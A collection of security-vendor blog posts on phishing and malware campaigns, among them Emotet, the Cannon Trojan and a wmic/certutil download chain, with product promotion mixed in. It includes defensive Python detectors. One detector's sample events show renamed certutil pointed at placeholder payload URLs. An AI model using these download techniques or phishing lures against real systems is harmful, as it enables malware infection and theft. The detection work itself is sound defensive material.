The California wildfire scam includes one major red flag. Rather than ask for a monetary donation, the scammers request money in the form of Google Play gift cards. The messages ask for the redemption codes to be sent back to the CEO by reply.

The emails are sent to staff members in the accounts and finance departments and the emails ask that the money be donated in 4 x $500 denomination gift cards. If these are returned to the CEO, he/she will then forward them on to company clients that have been impacted by the California wildfires.

The reason Google Play gift cards are asked for is that they can easily be exchanged on darknet forums for other currencies. The gift cards are almost impossible to trace back to the hacker.

The messages include lots of grammatical errors and incorrect spellings, which is another indication that the messages are not authentic. Even so, scams like this are sent because they are successful: many people have been tricked by similar scams previously.

Safeguarding against scams like this requires a combination of technical controls, end user training and company policies. An advanced spam filtering solution should be put in place – SpamTitan for instance – to stop messages such as these from arriving in inboxes. SpamTitan checks all incoming emails for spam signatures and uses complex techniques such as heuristics, machine learning and Bayesian analysis to spot advanced and never-before-seen phishing campaigns.

End user training is vital for all staff, especially those with access to corporate bank accounts. Those workers are usually targeted by scammers. Policies should be put in place that require all requests for changes to bank accounts, unusual payment requests, and wire transfers above a certain threshold to be confirmed by phone or in person before they are given approval.

A combination of these tactics will help to secure businesses from BEC attacks and other email scams.


Spam News

Our spam news section is a collection of up-to-date news articles on the latest threats that are likely to hit the inboxes of your employees. Hackers are always changing tactics, with new spam email campaigns, different social engineering ploys and new methods of installing malware and ransomware. By keeping up to date on the most recent spam news, organizations can take timely action to tackle risk.

In relation to that, a spam filtering solution is crucial. All it takes is for one employee to click on a malicious link or open an infected email attachment for an entire network to be infiltrated. A spam filter will check all incoming email messages and search for typical spam signatures in addition to checking senders’ email accounts against blacklists of known hackers. Email attachments will be checked for virus signatures and hyperlinks compared to blacklists of recognized malicious domains.

Armed with the most recent spam news articles, information security teams can send email alerts to their staff warning of pertinent threats they need to know about.

This section also includes news on industry-specific hacking attacks, in particular those that are being used to focus on and take advantage of the healthcare, education, financial services, legal and hospitality sectors.

Web Filtering Software for Schools

Although the aims of the Children´s Internet Protection Act (CIPA) – and later state legislation relating to web filters for schools – were undoubtedly well-intentioned, some educational institutions have been reluctant to adopt school web filtering software.

Some of the reasons for this reluctance are logical. Over-zealous web filters for schools can stop students from accessing educational material and teenage support groups, while students from lower-income families without home Internet can be hindered by “digital deprivation” in an over-filtered environment.

It is sometimes the case that school web filtering software is responsible for an over-filtered environment. Depending on the extent of the software, it may have a high maintenance overhead or lack the versatility to account for students of different ages studying a wide range of topics.

In these instances, it is easier for system managers to apply the maximum security settings to ensure compliance with federal and state laws. This is when the issues are seen. Now, there is a solution from SpamTitan that can resolve these issues quickly and simply – WebTitan Cloud.

WebTitan Cloud is cloud-based school web filtering software that is quick to put in place and easy to configure. Being a cloud-based solution, there is no hardware to buy or software to be installed – so no technical skills are required and there are no upfront costs to consider.

Once active, WebTitan Cloud uses a three-tier mechanism to review each request to visit a website against its filtering parameters, providing the level of granularity web filters for schools should have in order to be effective in a multi-age, multi-cultural environment.

The filtering parameters can be created according to age, by user, by class, or by year – and password protected – to ensure each student is able to access the educational and age-appropriate material they need to become digitally literate and in order to be able to seek help from support groups if needed.

Along with its versatility, WebTitan Cloud provides a safe barrier against online content prohibited by CIPA and protects networks and users´ devices against malware, adware, spyware and ransomware. Our school web filtering software also has security measures to prevent students trying to circumvent the filtering parameters. With WebTitan Cloud schools can:

  • Restrict access to VPNs and proxy websites.
  • Set up multilingual filter settings.
  • Stop access to cached website pages.
  • Filter out numerical IP addresses.

For schools that supply a wireless network for students, WebTitan Cloud for WiFi is equally as versatile and safe. Our school web filtering software for wireless networks allows schools to manage the content students can access from their mobile devices, and supplies a deep analysis of network activity – right down to the online activity of each individual user.

In states where parents have the right to state the level of Internet access their children can have at school, the versatility of WebTitan Cloud for WiFi prevents the scenario in which every child has to adhere to the wishes of the strictest parent. The detailed level of oversight also helps to identify students who may be using the Internet inappropriately and who are then vulnerable to online attacks.

Our WiFi web filters for schools can be deployed to filter Internet content from a single hotspot or multiple hotspots. The service safeguards users´ devices as well as the school´s network without affecting the speed at which web content is delivered. It also has a very useful bandwidth-restricting function that can stop students consuming a school´s bandwidth by streaming sports, films and music videos.

Our school web filtering software for both fixed networks and wireless networks has been created to be effective against online threats, compliant with federal and state laws, easy to use and sufficiently versatile to address concerns about stopping students from accessing educational material and teenage support groups. Now we invite you to test our web filters for schools for free.

If your school has been reluctant to put in place school web filtering software due to worries regarding an over-filtered environment, we invite you to contact us and discuss your concerns. Our team of Sales Technicians will reply to any questions you have about web filters for schools and invite you to have a free trial of WebTitan Cloud or WebTitan Cloud for WiFi – whichever is the most appropriate solution for your specific circumstances.

There are no set-up expenses to address, no credit cards are required and there are no contracts to complete in order to take advantage of our offer. Our free trial is intended to give you the chance to evaluate the merits of school web filtering in your own environment and there is no obligation on you to go on using our service once the free trial has ended. Call us now and your school could be safeguarding its students from online dangers and inappropriate content within 15 minutes.

MSPs Email Archiving: A Simple Way to Win Business & Increase Email Revenue

Email archiving for MSPs is an often-disregarded service that can add value and enhance profits. Email archiving is simple to implement and control, has a high margin, generates regular extra income, and is a simple sell to clients.

In this post we look into the advantages for clients and MSPs and explain why email archiving for MSPs and their clients is a win-win.

Advantages of Email Archiving for SMBs

Email archiving is now crucial for organizations of all sizes, from SMBs to the largest enterprises. Huge numbers of emails are sent and received on a daily basis and copies of those emails need to be stored, saved, and often retrieved. Storage of emails in mailboxes poses issues. The storage space necessary for emails and attachments can be considerable, which means hardware must be purchased and maintained. In terms of security, storing large amounts of emails in mailboxes is never wise.

Storing emails in backups is a solution, although it is far from ideal. Space is still necessary, and recovering emails when they are needed is a major issue, as backup files are not indexed and searching for messages can be extremely time consuming.

An email archive, on the other hand, is indexed and searchable, and emails can be quickly and easily retrieved on demand. If there is a legal dispute, or when an organization needs to demonstrate compliance – with GDPR or HIPAA for example – companies need to be able to recover emails quickly and easily. An email archive also puts in place a clear chain of custody, which is also necessary for compliance with many regulations.

Cloud-based archives offer secure storage for emails with no limits on storage space. Cloud storage is highly scalable and emails can be easily retrieved from any location.

In short, email archiving can enhance efficiency, enhance security, lower expenses, and is an invaluable compliance tool.

Advantages of Email Archiving for MSPs

Given the advantages of email archiving it should be an easy sell for MSPs, either as Office 365 archiving-as-a-service as an add-on or incorporated into current email packages to offer greater value and make your packages stand out from those of your competitors.

As an add-on service, Office 365 archiving-as-a-service will lead to regular income for very little effort and will improve the meagre returns from simply offering Office 365 to your clients. As part of a package it can help you win more business.

ArcTitan – Email Archiving for MSPs the Easy Way

TitanHQ is a leading provider of cloud-based security solutions for MSPs. All TitanHQ products – SpamTitan, WebTitan and ArcTitan SaaS email archiving – have been created from the ground up to specifically meet the requirements of MSPs.

ArcTitan has been created to be easy to adopt and manage, and it seamlessly integrates into MSPs’ service stacks, allowing them to supply increased value to clients and make email services a much more lucrative offering. On that front, TitanHQ is able to offer generous margins on ArcTitan for MSPs.

ArcTitan Advantages for MSPs

  • Easy to adopt
  • No hardware necessary
  • No software installation required
  • Very scalable email archiving
  • Safe, cloud-based storage with a simple to use centralized management system
  • Enhances profitability of Office 365
  • Simple for MSPs to set up
  • Straightforward for clients to use
  • Great profits for MSPs
  • Available with a full suite of APIs for easy integration
  • Usage-based pricing and monthly invoices
  • Multiple hosting solutions: TitanHQ Cloud, dedicated private cloud, or host the solution in your own data center
  • Completely rebrandable – ArcTitan can be supplied in white-label form ready for your own branding
  • Top class customer service and support

If you have yet to begin providing email archiving to your clients or if you are unhappy with your current supplier, get in touch with the TitanHQ MSP team today for full ArcTitan product information, details of pricing, and further information on our Alliance program.


Emotet Malware Being Spread Using Thanksgiving Themed Spam Emails

There has been a rise in malspam campaigns spreading Emotet malware in recent times, with many new campaigns initiated that spoof financial institutions – the modus operandi of the threat group behind the attacks.

The Emotet malware campaigns use Word documents containing malicious macros. If macros are enabled, the Emotet malware payload is installed. The Word documents are either sent as email attachments or the spam emails contain hyperlinks which direct users to a website from which the Word document is downloaded.

Various social engineering tricks have been used in these recent campaigns. One new tactic that was spotted by Cofense is the wrapping of malicious hyperlinks in Proofpoint’s (PFPT) TAP URL Defense wrapping service to make the email seem benign.

According to Cofense, the campaign delivers Emotet malware, and Emotet in turn installs a secondary payload. In past campaigns, Emotet has been delivered together with ransomware: first Emotet steals information, then the ransomware is used to take money from victims. In the most recent campaign, the secondary payload is the banking Trojan IcedID.

An additional campaign has been seen that uses Thanksgiving-themed spam emails. The messages seem to be Thanksgiving greetings for employees, and similarly include a malicious hyperlink or document. The messages claim the document is a Thanksgiving card or greeting. Many of the emails have been personalized to help with the deception and include the user’s name. In this campaign, while the downloaded document seems to be a Word file, it is actually an XML file.
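As an added example (not code from the original post or from TitanHQ), the following Python check catches the mismatch described above: a file delivered with a Word extension whose content is actually XML, and a macro-free extension that nonetheless carries a VBA project. The magic bytes are public format signatures, the sample attachments are constructed here, and the `macrosPresent` check assumes the WordML root-element attribute name.

```python
import io
import os
import zipfile

# Public format signatures (not values taken from the campaign).
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc: OLE2 compound file
ZIP_MAGIC = b"PK\x03\x04"                           # .docx/.docm: OOXML is a zip package

# What each Word extension should contain on disk.
EXPECTED_CONTAINER = {".doc": "ole2", ".dot": "ole2",
                      ".docx": "zip", ".docm": "zip", ".dotx": "zip", ".dotm": "zip"}
MACRO_FREE_EXTENSIONS = {".docx", ".dotx"}   # Word will not run VBA from these


def sniff_container(data: bytes) -> str:
    """Classify a file by its leading bytes, ignoring the claimed extension."""
    if data.startswith(OLE_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    head = data.lstrip(b"\xef\xbb\xbf \t\r\n")   # tolerate a BOM / leading whitespace
    if head.startswith(b"<"):
        return "xml"                              # e.g. Word 2003 XML (WordML)
    return "unknown"


def word_file_verdict(filename: str, data: bytes) -> dict:
    """Compare the extension against the real content and report macro presence."""
    ext = os.path.splitext(filename)[1].lower()
    container = sniff_container(data)
    macros = False
    findings = []

    expected = EXPECTED_CONTAINER.get(ext)
    if expected is None:
        findings.append(f"{ext or '(none)'} is not a Word extension")
    elif container != expected:
        findings.append(f"{ext} implies a {expected} container but the content is {container}")

    if container == "zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                macros = "word/vbaProject.bin" in zf.namelist()
        except zipfile.BadZipFile:
            findings.append("zip container is malformed")
    elif container == "xml":
        # Assumption: WordML marks embedded VBA with w:macrosPresent="yes" on its root element.
        macros = b'macrosPresent="yes"' in data

    if macros and ext in MACRO_FREE_EXTENSIONS:
        findings.append(f"{ext} should be macro-free but a VBA project is present")

    return {"container": container, "macros": macros,
            "findings": findings, "suspicious": bool(findings)}


def build_ooxml(with_macros: bool) -> bytes:
    """Constructed minimal OOXML package, used only as sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            zf.writestr("word/vbaProject.bin", b"\x00" * 16)
    return buf.getvalue()


# Constructed sample attachments, labelled by what they pretend to be.
SAMPLES = {
    "invoice.doc": OLE_MAGIC + b"\x00" * 24,          # genuine legacy .doc
    "report.docx": build_ooxml(with_macros=False),    # genuine macro-free .docx
    "form.docm": build_ooxml(with_macros=True),       # macros in a macro-enabled type: allowed
    "card.docx": build_ooxml(with_macros=True),       # VBA project inside a .docx: wrong
    "Thanksgiving_eCard.docx": (                      # XML dressed up as .docx, like the decoy above
        b'<?xml version="1.0"?>\n'
        b'<w:wordDocument w:macrosPresent="yes">...</w:wordDocument>'),
}


def scan_samples() -> dict:
    """Run the verdict over every constructed sample."""
    return {name: word_file_verdict(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        flag = "SUSPICIOUS" if verdict["suspicious"] else "ok"
        print(f"{name:26} {verdict['container']:8} macros={verdict['macros']!s:5} {flag} {verdict['findings']}")
```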

Emotet malware has also been updated recently. Along with stealing credentials, a new module has been added that harvests emails from an infected user. The previous six months’ emails – including subjects, senders, and message content – are exfiltrated. This new module is thought to have been added to enhance the effectiveness of future phishing campaigns and to support corporate espionage and data theft.

The latest increase in Emotet malware campaigns, and the wide variety of tactics used by the threat actors behind these campaigns, highlight the importance of implementing a defense in depth strategy to block phishing emails. Organizations should not rely on one cybersecurity solution to provide security against email attacks.

Phishing campaigns aim for a weak link in security defenses: staff members. It is therefore vital to ensure that all employees with corporate email accounts are taught how to spot phishing threats. Training needs to be ongoing and should cover the latest tactics used by cybercriminals to spread malware and steal data. Staff are the last line of defense. Through security awareness training, that defensive line can be greatly strengthened.

As a frontline defense, all businesses and groups should deploy an advanced spam filtering solution. While Office 365 email includes a basic level of protection against phishing attacks, a powerful third-party anti-phishing and spam filtering solution is needed to provide protection against more complex email attacks.

SpamTitan is an advanced email filtering solution that employs predictive techniques to provide superior protection against phishing attacks, zero-day attacks, and new malware variants that bypass signature-based defenses.

Along with scanning message content, headers, attachments, and hyperlinks for spam and malware signatures, SpamTitan uses heuristics, machine learning, and Bayesian analysis to discover emerging threats. Greylisting is used to identify and block large-scale spam campaigns, such as those typically carried out by the threat actors spreading banking Trojans and Emotet malware.


Lion Air Spear Phishing Campaign Shares Stealthy Cannon Trojan

A newly created malware variant, called the Cannon Trojan, is being used in targeted attacks on government agencies in the United States and Europe. The new malware threat has been attributed to a threat group known by many names – APT28, Fancy Bear, Sofacy, Sednit, Strontium – that has links to the Russian government.

The Cannon Trojan is being used to gather data on potential targets, collating system information and capturing screenshots that are sent back to APT28. The Cannon Trojan is also an installer capable of loading further malware variants onto a compromised system.

The new malware threat is stealthy and uses a range of tricks to avoid detection and hide communications with its C2. Rather than communicating over HTTP/HTTPS, like other malware variants used by APT28, the Cannon Trojan communicates through email over SMTPS and POP3S.

Once installed, the malware sends an email over SMTPS on port 465, and obtains two further email addresses through which it communicates with its C2 using the POP3S protocol to receive instructions and send back data. While the use of email for communicating with a C2 is not unknown, it is relatively unusual. One advantage of this method of communication is that it is more difficult to spot and block than HTTP/HTTPS.

The Cannon Trojan, like the Zebrocy Trojan which is also being used by APT28, is being shared via spear phishing emails. Two email templates have been captured by Palo Alto Networks’ Unit 42 team, one of which takes advantage of interest in the Lion Air plane crash in Indonesia.

The Lion Air spear phishing campaign purports to provide data on the victims of the crash, which the email claims are listed in an attached Word document titled Crash List (Lion Air Boeing 737).docx. The user must Enable Content to see the contents of the document. It is alleged that the document was created in an earlier version of Word and content must be turned on for the file to be displayed. Opening the attachment and enabling content would trigger the macro to run, which would then silently install the Cannon Trojan.

Instead of the macro running and downloading the payload immediately, as an anti-analysis mechanism, the hackers use the Windows AutoClose tool to delay the completion of the macro routine until the document is closed. Only then is the Trojan installed. Any sandbox that analyzes the document and exits before closing the document would be unlikely to view it as malicious. Further, the macro will only run if a link with the C2 is established. Even if the document is opened and content is enabled, the macro will not run without its C2 channel open.

The techniques employed by the hackers to obfuscate the macro and hide communications make this threat difficult to spot. The key to stopping infection is blocking the threat at source and preventing it from arriving in inboxes. The provision of end user training to help employees identify threats, such as emails with attachments from unknown senders, is also vital.

Banking Trojans Installed Using Windows Components in New Office 365 Threat

A new Office 365 threat has been discovered that stealthily downloads malware by using legitimate Windows components to mask its communications and downloads.

The attack begins with a malspam email containing a malicious link. Various themes could be used to encourage users to visit the link, although one of the latest campaigns masquerades as emails from the national postal service in Brazil.

The emails claim the postal service tried to deliver a package, but the delivery failed as there was no one home. The tracking code for the package is listed in the email and the user is requested to click the link in the email to receive the tracking data.

In this instance, clicking the link leads to a popup asking the user to confirm the download of a zip file, which it is claimed contains the tracking information. If the zip file is downloaded, the user is asked to click on a LNK file to receive the information. The LNK file runs cmd.exe, which executes the Windows Management Instrumentation (WMI) command-line utility wmic.exe. This legitimate Windows file is used to communicate with the attacker’s C2 server and to create a copy of another Windows file, certutil.exe, in the %temp% folder under the name certis.exe. A script then runs which instructs certis.exe to connect to a different C2 server to download malicious files.
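The chain described above can be detected in process-creation telemetry without blocking wmic.exe or certutil.exe outright; the following is an added example and not code from the original article. A copy of certutil.exe running as certis.exe still carries certutil's OriginalFileName in its PE version information (the field Sysmon Event ID 1 reports), and a wmic.exe launched from cmd.exe with a URL on its command line is rare in normal administration. The events, paths and URLs are constructed to mirror the described chain; command-line arguments are placeholders.

```python
"""Spot the wmic.exe -> renamed certutil.exe download chain in process-creation logs.

Added example (not from the original article). Fields mirror Sysmon Event ID 1
(Image, OriginalFileName, CommandLine, ParentProcessId); the events below are
constructed and use example.invalid hosts.
"""
import ntpath
import re

LOLBINS = {"certutil.exe", "wmic.exe"}   # trusted binaries abused in the described chain
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed Sysmon-style process creation events (arguments are placeholders).
SAMPLE_EVENTS = [
    {"pid": 4101, "ppid": 3200, "image": r"C:\Windows\explorer.exe",
     "original_filename": "EXPLORER.EXE", "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 4101, "image": r"C:\Windows\System32\cmd.exe",
     "original_filename": "Cmd.Exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\rastreamento.lnk"'},
    {"pid": 4133, "ppid": 4120, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "original_filename": "wmic.exe",
     "cmdline": "wmic.exe <constructed args> https://c2.example.invalid/stage"},
    {"pid": 4150, "ppid": 4133, "image": r"C:\Users\u\AppData\Local\Temp\certis.exe",
     "original_filename": "CertUtil.exe",
     "cmdline": "certis.exe <constructed download args> https://dl.example.invalid/payload.bin"},
    {"pid": 5001, "ppid": 900, "image": r"C:\Windows\System32\certutil.exe",
     "original_filename": "CertUtil.exe",
     "cmdline": "certutil.exe -verify cert.cer"},   # benign use, must not alert
]


def basename(path):
    return ntpath.basename(path).lower()


def detect_lolbin_chain(events):
    """Return [(pid, reason)] for events matching the abuse pattern."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        orig = e["original_filename"].lower()
        parent = by_pid.get(e["ppid"])
        if orig not in LOLBINS:
            continue
        # 1. A LOLBin running under a different file name (certutil.exe copied as certis.exe).
        if name != orig:
            findings.append((e["pid"], f"{orig} renamed to {name} in {ntpath.dirname(e['image'])}"))
        # 2. A LOLBin whose command line carries a URL: download or C2 via a trusted binary.
        url = URL_RE.search(e["cmdline"])
        if url:
            findings.append((e["pid"], f"{orig} invoked with URL {url.group(0)}"))
        # 3. wmic.exe spawned by cmd.exe (here: cmd.exe launched via the LNK file).
        if orig == "wmic.exe" and parent and basename(parent["image"]) == "cmd.exe":
            findings.append((e["pid"], "wmic.exe launched from cmd.exe"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect_lolbin_chain(SAMPLE_EVENTS):
        print(pid, reason)
```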

The focus of this attack is to use authentic Windows files to install the malicious payload: A banking Trojan. The use of legitimate Windows files for communication and installing files helps the attackers bypass security controls and download the malicious payload unnoticed.

These Windows files can install other files for legitimate purposes, so it is hard for security teams to identify malicious activity. This campaign focuses on users in Brazil, but this Office 365 threat should be a worry for all users as other threat actors have also adopted this tactic to download malware.

Due to the difficulty of distinguishing between legitimate and malicious wmic.exe and certutil.exe activity, blocking an Office 365 threat such as this is simplest at the initial point of attack: stopping the malicious email from reaching an inbox, and providing security awareness training to workers to help them spot this Office 365 threat. The latter is vital for all companies; employees can be turned into a strong last line of defense through security awareness training. The former can be achieved with a spam filtering solution such as SpamTitan, which stops that last line of defense from being tested in the first place.

Microsoft uses many different ways to spot malspam and prevent malicious messages from arriving in users’ inboxes; however, while efforts have been made to improve the effectiveness of the spam filtering controls of Office 365, many malicious messages are still reaching their destinations.

To enhance Office 365 security, a third-party spam filtering solution should be implemented. SpamTitan has been designed for easy integration with Office 365 and provides superior protection against a wide range of email threats.

SpamTitan uses a range of different methods to stop malspam from being sent to end users’ inboxes, including predictive techniques to discover threats that are misidentified by Office 365 security controls. These methods ensure industry-leading catch rates of over 99.9% and stop malicious emails from arriving in inboxes.

HookAds Malvertising Campaign Sending People to Trojans, Info Stealers and Ransomware Websites

One of the ways that threat actors download malware is using malvertising. Malvertising is the positioning of malicious adverts on legitimate websites that send visitors to websites where malware is installed. The HookAds malvertising campaign is one such example and those responsible for the campaign have been particularly active recently.

The HookAds malvertising campaign has one aim – to direct people to a website hosting the Fallout exploit kit. An exploit kit is malicious code that operates when a visitor arrives on a web page. The visitor’s computer is explored to determine whether there are any flaws – unpatched software – that can be exploited to silently download files.

In the case of the Fallout exploit kit, users’ devices are explored for several known Windows vulnerabilities. If one is discovered, it is exploited and a malicious payload is installed. Several malware variants are currently being shared via Fallout, including data stealers, banking Trojans, and ransomware.

According to threat analyst nao_sec, two different HookAds malvertising campaigns have been identified: One is being used to broadcast the DanaBot banking Trojan and the other is sending two malware payloads – The Nocturnal data stealer and GlobeImposter ransomware via the Fallout exploit kit.

Exploit kits can only deliver malware to unpatched devices, so businesses will only be under threat from this web-based attack vector if they are not 100% up to date with their patching. Sadly, many businesses are slow to apply patches, and exploits for new vulnerabilities are frequently added to EKs such as Fallout. A security solution is therefore needed to block this attack vector.

The threat actors responsible for the HookAds malvertising campaign are taking advantage of the low prices for advertising blocks on websites by low quality ad networks – those often utilized by owners of online gaming websites, adult sites, and other types of websites that should not be logged onto by employees. While the site owners themselves are not actively working with the threat actors behind the campaign, the malicious adverts are still displayed on their websites along with legitimate ads. The use of a web filter is advisable to mitigate this threat.

Emotet Malware Spread Using Thanksgiving Themed Spam Emails

There has been a rise in malspam campaigns spreading Emotet malware recently, with many new campaigns initiated that spoof financial institutions, the usual operating method of the threat group responsible for the campaigns.

The Emotet malware campaigns use Word documents containing malicious macros. If macros are enabled, the Emotet malware payload is installed. The Word documents are either sent as email attachments or the spam emails include hyperlinks which take users to a website where the Word document is downloaded.

Various social engineering tricks have been implemented in these campaigns. One new tactic that was spotted by Cofense is the wrapping of malicious hyperlinks in Proofpoint’s (PFPT) TAP URL Defense wrapping service to make the email seem benign.

According to Cofense, the campaign delivers Emotet malware, which in turn installs a secondary payload. In previous campaigns, Emotet has been paired with ransomware: first Emotet steals details, then the ransomware is used to extract money from victims. In the most recent campaign, the secondary malware is the banking Trojan IcedID.

Another campaign has been discovered that uses Thanksgiving themed spam emails. The messages seem to be Thanksgiving greetings for employees, and similarly include a malicious hyperlink or document. The messages say that the document is a Thanksgiving card or greeting. Many of the emails have been personalized to help with the deception and include the user’s name. In this campaign, while the document downloaded seems to be a Word file, it is actually an XML file.
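Two of the lure details above can be checked mechanically at the mail gateway or by an analyst, and the following is an added example rather than code from Cofense or the original article: a Proofpoint URL Defense v2 link can be unwrapped to reveal the real destination before it is judged benign, and a downloaded "Word file" can be compared against the magic bytes its extension implies, so that an XML document wearing a .doc extension is flagged. The decoding follows Proofpoint's published v2 rules (replace '-' with '%' and '_' with '/' in the u= parameter, then percent-decode); the wrapped link, the lure host and the file contents are constructed.

```python
"""Unwrap URL Defense v2 links and check a downloaded file's magic bytes vs its extension.

Added example (not from the original article). The sample link and file
contents are constructed; "lure.example" is a placeholder host.
"""
from urllib.parse import parse_qs, unquote, urlparse

# Constructed: a URL Defense v2 wrapper around https://lure.example/thanks/card.doc
WRAPPED_LINK = ("https://urldefense.proofpoint.com/v2/url?"
                "u=https-3A__lure.example_thanks_card.doc&d=DwMFaQ&c=constructed")


def unwrap_urldefense_v2(url):
    """Return the original URL behind a urldefense.proofpoint.com/v2 link, else the input unchanged."""
    parsed = urlparse(url)
    if not parsed.netloc.endswith("urldefense.proofpoint.com") or not parsed.path.startswith("/v2/"):
        return url
    encoded = parse_qs(parsed.query).get("u", [None])[0]
    if encoded is None:
        return url
    # v2 encodes '/' as '_' and '%' as '-' so the destination survives in a query string.
    return unquote(encoded.replace("-", "%").replace("_", "/"))


# Leading bytes that identify the container, checked in order.
MAGIC = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),   # legacy binary .doc/.xls container
    (b"PK\x03\x04", "zip"),                          # OOXML (.docx) or any zip
    (b"<?xml", "xml"),                               # Word 2003 XML / Flat OPC
    (b"MZ", "pe"),                                   # Windows executable
]
# What a given extension should contain. A .doc that is really XML is the Emotet trick above.
EXPECTED = {".doc": {"ole2"}, ".docx": {"zip"}, ".xml": {"xml"}, ".exe": {"pe"}}

# Constructed Word 2003 XML body delivered with a .doc extension.
SAMPLE_XML_DOC = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
                  b'<?mso-application progid="Word.Document"?>\n'
                  b'<w:wordDocument xmlns:w="urn:schemas-microsoft-com:office:word"></w:wordDocument>')


def sniff(data):
    """Classify the container from its leading bytes, tolerating a BOM/whitespace before an XML prolog."""
    head = data.lstrip(b"\xef\xbb\xbf \t\r\n")
    for magic, kind in MAGIC:
        if data.startswith(magic) or head.startswith(magic):
            return kind
    return "unknown"


def check_attachment(filename, data):
    """Return (kind, mismatch, note) comparing the file's real container to its extension."""
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    kind = sniff(data)
    expected = EXPECTED.get(ext)
    if expected is None:
        return kind, False, f"no expectation recorded for extension {ext!r}"
    if kind not in expected:
        return kind, True, f"{filename} claims {ext} but the content is {kind}"
    return kind, False, "extension matches content"


if __name__ == "__main__":
    print(unwrap_urldefense_v2(WRAPPED_LINK))
    print(check_attachment("Thanksgiving_Card.doc", SAMPLE_XML_DOC))
```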

Emotet malware has been refreshed recently. In addition to stealing details, a new module has been incorporated which harvests emails from an infected user. The past six months’ emails – which include subjects, senders, and message content – are stolen. This new module is thought to have been added to enhance the effectiveness of future phishing campaigns, for corporate espionage, and data theft.

The recent rise in Emotet malware campaigns, and the highly varied tactics used by the threat actors behind them, emphasise the importance of adopting a defense in depth strategy to block phishing emails. Organisations should not rely on a single cybersecurity solution to protect against these attacks.

Phishing campaigns aim for a weak link in security defenses: Staff members. It is therefore wise to ensure that all employees with corporate email accounts are trained how to recognize phishing threats. Training needs to be constant and should cover the latest tactics used by hackers to spread malware and steal details. Staff members are the last line of defense. Through security awareness training, the defensive line can be significantly enhanced.

As a frontline defense, all businesses and groups should use an advanced spam filtering solution. While Office 365 email includes a basic level of protection against phishing attacks, a powerful third-party anti-phishing and spam filtering solution is needed to provide security against more complex email attacks.

SpamTitan is an advanced email filtering software that uses predictive techniques to supply superior protection against phishing attacks, zero-day attacks, and new malware variants that bypass signature-based security.

Along with scanning message content, headers, attachments, and hyperlinks for spam and malware signatures, SpamTitan employs heuristics, machine learning, and Bayesian analysis to spot emerging threats. Greylisting is used to spot and obstruct large scale spam campaigns, such as those usually carried out by the threat actors spreading banking Trojans and Emotet malware.

Easy Way to Win Business and Boost Revenue for MSPs With Email Archiving

Email archiving is a great way for a company to win business and boost revenue. Although it is often an overlooked service, it can add value and improve profits for MSPs. Email archiving has a high margin, generates regular additional income, is easy to implement and manage and is an easy sell to clients.

Email Archiving in SMBs

Email archiving is now essential for organisations of all sizes, from SMBs to the largest enterprises. Large numbers of emails are sent and received on a daily basis by companies. Copies of those emails need to be stored, saved, and often retrieved. Storage of emails in mailboxes can often pose problems. Emails and attachments often need a considerable amount of storage, which means hardware must be purchased and maintained. Storing large volumes of emails in mailboxes is not a secure way of storing emails.

Although storing emails in backups is an option, it is far from ideal. Space is still needed and recovering emails when they are required is not a straightforward task as backup files are not indexed and searching for messages can take a considerable amount of time.

An email archive, in comparison, is indexed and searchable and therefore emails can be retrieved on demand quickly and with ease. If there is a legal dispute or when an organisation needs to demonstrate compliance (with GDPR or HIPAA for example) businesses need to be able to recover emails in an efficient manner. Additionally, an email archive also provides a clear chain of custody, which is also required to comply with a lot of regulations.

Cloud-based archives offer secure storage for emails and have no restrictions on storage space. The cloud storage offered is also highly scalable and emails can be easily retrieved, regardless of the location.

In summary, email archiving can enhance security, lower costs, improve efficiency and is an invaluable compliance tool.

Email Archiving in MSPs

Due to the benefits of email archiving it should be an easy sell for MSPs, either as Office 365 archiving-as-a-service as an add-on or incorporated into existing email packages. This is in order to offer greater value and make your packages unique compared to those of your competitors.

Office 365 archiving-as-a-service will generate regular income for very little effort as an add-on service. It will also improve the meagre returns from simply reselling Office 365 to your clients. Overall, it can help you to attract more business when offered as part of a package.

Email Archiving Made Simple for MSPs by ArcTitan

TitanHQ is a leading provider of cloud-based security solutions for MSPs. TitanHQ products such as SpamTitan, WebTitan and ArcTitan SaaS email archiving have all been developed from the ground up to specifically meet the various needs of MSPs.

ArcTitan has been developed by TitanHQ to be easy to implement and manage. It integrates seamlessly into MSPs’ service stacks, allowing them to provide greater value to clients and make email services a much more lucrative offering. As a result, TitanHQ is able to offer generous margins on ArcTitan for MSPs.

Benefits of ArcTitan for MSPs

  • Easy implementation
  • Software downloads not necessary
  • No hardware requirements
  • Secure, cloud-based storage
  • Easy to operate centralised management system
  • Increases profitability of Office 365
  • Highly scalable email archiving
  • Easy set up for MSPs
  • Usage easy for clients
  • Improved margins for MSPs
  • Full suite of APIs supplied for simpler integration
  • Multiple hosting options: TitanHQ Cloud, dedicated private cloud, or host the solution in your own data centre
  • Fully rebrandable (ArcTitan can be supplied in white-label form ready for your own branding)
  • Usage-based pricing and monthly billing available
  • World class customer service and support

If you are yet to start offering email archiving to your clients or if you are unhappy with your current provider, contact the TitanHQ MSP team today for full ArcTitan product information, pricing details and further information on our MSP Program.

Office 365 Phishing Attacks Are Abusing Cloud Service Providers’ SSL Certificates

Office 365 phishing attacks are very common and highly realistic, and Office 365 spam filtering controls are easily bypassed by hackers to ensure messages reach inboxes. Additionally, phishing forms are being hosted on web pages secured with valid Microsoft SSL certificates to fool users into thinking that the websites are authentic.

Office 365 Phishing Attacks Can Be Difficult to Spot

